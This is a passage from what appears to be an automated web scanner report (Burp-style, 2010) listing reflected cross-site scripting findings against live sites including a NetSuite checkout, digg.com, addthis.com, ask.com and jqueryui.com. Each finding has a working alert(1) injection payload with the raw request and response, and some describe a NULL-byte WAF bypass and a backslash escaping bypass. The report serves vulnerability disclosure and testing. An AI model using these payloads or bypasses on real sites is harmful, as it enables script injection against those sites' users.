Cookie: __utma=1.2027734133.1289244024.1289251037.1290273104.3; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=LycGMyBNRjjQpg2yQxfl568LH03v7PJ2JZhbrvfVJvqcPnWypyG9MDpC5CBHkTSjvQXJ7XfkxPhrQJbWLwsx4vv2QwMgnpHZ4bfg8R2qCtRQh3R6Q1mQQGCHQQcl4G9c!-548196153; NS_VER=2010.2.0; __utmb=1.1.10.1290273104; __utmc=1; NLVisitorId=rnoX2kNXAZKv7gpK; NLShopperId=rnoX2lhXAQEmkIji; NLShopperId7=rnoX2qVXAQEJBIY6; NLShopperId3=rnoX2q9XAatYKaJC; StoreEmail=rt'@1.com
Content-Length: 276

origsc=4&c=1034828&n=3&sc=4&category=shipping&id=&it=A&vid=rnoX2kNXAZKv7gpK&ck=rnoX2q9XAatYKaJC&cktime=87993&cart=148243&referer=https%3A%2F%2Fcheckout.netsuite.com%2Fs.nl%3Fc%3D1034828%26sc%3D4%26category%3Dshipping%26n%3D3&sShipMeth=12440&continueclicked=T&kReferralCode=%27&8bc49'style%3d'x%3aexpression(alert(1))'02b68d32520=1

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:32:28 GMT
Server: Apache
Cache-Control: max-age=300
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1160675152:616363742D6A6176613038352E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: NLShopperId3=rnoX2rlXAbAOWAq7; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:32:29 GMT; path=/
Set-Cookie: NLShopperId3=rnoX2rlXAbAOWAq7; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:32:29 GMT; path=/
Set-Cookie: NLShopperId3=rnoX2rlXAbAOWAq7; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:32:29 GMT; path=/
Set-Cookie: NLShopperId3=rnoX2rlXAbAOWAq7; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:32:29 GMT; path=/
Set-Cookie: NLShopperId3=rnoX2rlXAbAOWAq7; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:32:29 GMT; path=/
Set-Cookie: NLShopperId3=rnoX2rlXAbAOWAq7; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:32:29 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=990
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 52738


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Checkout - Turner</title>


<meta name="robots" content="noindex,nofollow">
<script language='JavaScript' type
...[SNIP]...
<input type='hidden' name='referer' value='https://checkout.netsuite.com/s.nl?continueclicked=T&kReferralCode=%27&vid=rnoX2kNXAZKv7gpK&n=3&origsc=4&ck=rnoX2q9XAatYKaJC&sShipMeth=12440&cart=148243&8bc49'style='x:expression(alert(1))'02b68d32520=1&cktime=87993'>
...[SNIP]...

2.18. https://checkout.netsuite.com/s.nl [vid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /s.nl

Issue detail

The value of the vid request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload be972'><script>alert(1)</script>b07e51e7e4a was submitted in the vid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /s.nl HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: https://checkout.netsuite.com/s.nl/c.1034828/n.3/sc.4/category.shipping/.f
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: checkout.netsuite.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: __utma=1.2027734133.1289244024.1289251037.1290273104.3; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=LycGMyBNRjjQpg2yQxfl568LH03v7PJ2JZhbrvfVJvqcPnWypyG9MDpC5CBHkTSjvQXJ7XfkxPhrQJbWLwsx4vv2QwMgnpHZ4bfg8R2qCtRQh3R6Q1mQQGCHQQcl4G9c!-548196153; NS_VER=2010.2.0; __utmb=1.1.10.1290273104; __utmc=1; NLVisitorId=rnoX2kNXAZKv7gpK; NLShopperId=rnoX2lhXAQEmkIji; NLShopperId7=rnoX2qVXAQEJBIY6; NLShopperId3=rnoX2q9XAatYKaJC; StoreEmail=rt'@1.com
Content-Length: 276

origsc=4&c=1034828&n=3&sc=4&category=shipping&id=&it=A&vid=rnoX2kNXAZKv7gpKbe972'><script>alert(1)</script>b07e51e7e4a&ck=rnoX2q9XAatYKaJC&cktime=87993&cart=148243&referer=https%3A%2F%2Fcheckout.netsuite.com%2Fs.nl%3Fc%3D1034828%26sc%3D4%26category%3Dshipping%26n%3D3&sShipMeth=12440&continueclicked=T&kReferralCode=%2
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:49:13 GMT
Server: Apache
Cache-Control: max-age=300
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 171064755:616363742D6A6176613038352E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=vXc6MyKZQN6rT2TpmWLlpPYKymvMs21nWLJn4YfbHC2VkbKFCTpgHdWhTsfwVcJvksz6JspzMvTP1cyy1KcnBXLFyTZsMrbl41zBcbgBdFWnZ88bXQMBTxkblSHpT2yd!-548196153; path=/
Set-Cookie: NLVisitorId=rnoX2kNXAZKv7gpKbe972'><script>alert(1)</script>b07e51e7e4a; domain=.netsuite.com; expires=Friday, 11-Nov-2011 17:49:13 GMT; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:49:13 GMT; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:49:13 GMT; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:49:13 GMT; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.netsuite.com; expires=Saturday, 27-Nov-2010 17:49:13 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=949
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 56929


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Checkout - Turner</title>


<meta name="robots" content="noindex,nofollow">
<script language='JavaScript' type
...[SNIP]...
<input type='hidden' name='vid' value='rnoX2kNXAZKv7gpKbe972'><script>alert(1)</script>b07e51e7e4a'>
...[SNIP]...

2.19. http://dictionary.reference.com/browse/turn [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dictionary.reference.com
Path:   /browse/turn

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4efa7'-alert(1)-'c39736470a4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/turn4efa7'-alert(1)-'c39736470a4 HTTP/1.1
Host: dictionary.reference.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:53:41 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Set-Cookie: classicef=3ae7a17daae7a17da; Domain=reference.com; Expires=Sun, 20-Nov-2011 17:53:41 GMT; Path=/
Set-Cookie: NewUser=|ds1; Domain=reference.com; Expires=Sun, 20-Nov-2011 17:53:41 GMT; Path=/
Set-Cookie: accepting=1; Domain=.reference.com; Expires=Sun, 20-Nov-2011 17:53:41 GMT; Path=/
Connection: close
Content-Length: 44233


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
<head
...[SNIP]...
<script type="text/javascript">
function adcall(){
var adTarget;
adTarget ='/site=dictionary.com/area=search/aamsz=720x300/keyword=turn4efa7'-alert(1)-'c39736470a4'+ '' +'/pageid=' + aamPageId +'/random=' + aamRndNum;
mywindow=window.open ("","mywindow","status=1");
mywindow.document.write('<scr' + 'ipt language="javascript" type="text/javascript"' +' src="' + a
...[SNIP]...

2.20. http://digg.com/submit [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %005cb94"><script>alert(1)</script>0818a587233 was submitted in the REST URL parameter 1. This input was echoed as 5cb94"><script>alert(1)</script>0818a587233 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%005cb94"><script>alert(1)</script>0818a587233 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 16:50:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=2233503940199055809%3A136; expires=Mon, 20-Dec-2010 16:50:41 GMT; path=/; domain=digg.com
Set-Cookie: d=d435a4bd0a1485d46aa44d42abf1d4ec3ffeea842f2c2d916cfae535ea33c726; expires=Fri, 20-Nov-2020 02:58:21 GMT; path=/; domain=.digg.com
X-Digg-Time: D=280200 10.2.130.111
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15330

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg - error_ - Profile</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics,
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%005cb94"><script>alert(1)</script>0818a587233.rss">
...[SNIP]...

2.21. http://ds.addthis.com/red/psi/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 729d1<script>alert(1)</script>ee38120a664 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/p.json?callback=_ate.ad.hpr729d1<script>alert(1)</script>ee38120a664 HTTP/1.1
Host: ds.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dt=X; uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 246
Content-Type: text/javascript
Set-Cookie: di=%7B%7D..1290271839.10R|1290201756.60|1289335234.66; Domain=.addthis.com; Expires=Mon, 19-Nov-2012 04:52:57 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 20 Dec 2010 16:50:39 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sat, 20 Nov 2010 16:50:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 16:50:39 GMT
Connection: close

_ate.ad.hpr729d1<script>alert(1)</script>ee38120a664({"urls":["http://segment-pixel.invitemedia.com/set_partner_uid?partnerID=115&partnerUID=4cd70ff39ffa55be&sscs_active=1"],"segments" : ["10R"],"loc": "NzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg=="})

2.22. http://ds.addthis.com/red/psi/sites/www.directpointe.com/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.directpointe.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload acd1e<script>alert(1)</script>a8518672223 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.directpointe.com/p.json?callback=_ate.ad.hpracd1e<script>alert(1)</script>a8518672223&uid=4cd70ff39ffa55be&url=http%3A%2F%2Fwww.directpointe.com%2F&pusuw0 HTTP/1.1
Accept: */*
Referer: http://s7.addthis.com/static/r07/sh28.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ds.addthis.com
Proxy-Connection: Keep-Alive
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sat, 20 Nov 2010 16:48:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 16:48:59 GMT
Connection: close

_ate.ad.hpracd1e<script>alert(1)</script>a8518672223({"urls":[],"segments" : [],"loc": "NzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg=="})

2.23. http://images.ask.com/pictures [q parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://images.ask.com
Path:   /pictures

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c305d\'%3b635163da252 was submitted in the q parameter. This input was echoed as c305d\\';635163da252 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /pictures?qsrc=0&o=0&l=dir&q=c305d\'%3b635163da252 HTTP/1.1
Host: images.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 16:51:36 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Mon, 19-Nov-2012 16:51:37 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: tbe=1; Domain=.ask.com; Expires=Sun, 20-Nov-2011 16:51:37 GMT; Path=/
Set-Cookie: accepting=1; Domain=.ask.com; Expires=Sun, 20-Nov-2011 16:51:37 GMT; Path=/
Set-Cookie: user=o=0&l=dir; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjUxOjM3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Sun, 20-Nov-2011 16:51:37 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Sun, 20-Nov-2011 16:51:37 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Connection: close
Content-Length: 49999


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>



...[SNIP]...
ds_recieved= '';
google_language = '';
google_country = '';
google_encoding = 'utf8';
google_safe = 'high';
google_adtest = 'off';
google_hints = 'c305d\\';635163da252';
google_kw = 'c305d\\';635163da252';
google_kw_type = 'broad';

var oScript = document.getElementById('bannerAd_ctrScript');

oScript.setAttribute('fSecondCall',
...[SNIP]...

2.24. http://jqueryui.com/themeroller/ [bgColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b626"><script>alert(1)</script>9ec3e8ecc13 was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F85b626"><script>alert(1)</script>9ec3e8ecc13&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F85b626"><script>alert(1)</script>9ec3e8ecc13&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHi
...[SNIP]...

2.25. http://jqueryui.com/themeroller/ [bgColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b6b8"><script>alert(1)</script>2191a8942ba was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF3b6b8"><script>alert(1)</script>2191a8942ba&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:34 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ld&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF3b6b8"><script>alert(1)</script>2191a8942ba&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault
...[SNIP]...

2.26. http://jqueryui.com/themeroller/ [bgColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d054d"><script>alert(1)</script>a6d04b0004 was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFFd054d"><script>alert(1)</script>a6d04b0004&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:41 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120319

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFFd054d"><script>alert(1)</script>a6d04b0004&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHo
...[SNIP]...

2.27. http://jqueryui.com/themeroller/ [bgColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4088"><script>alert(1)</script>2de39e79b84 was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgI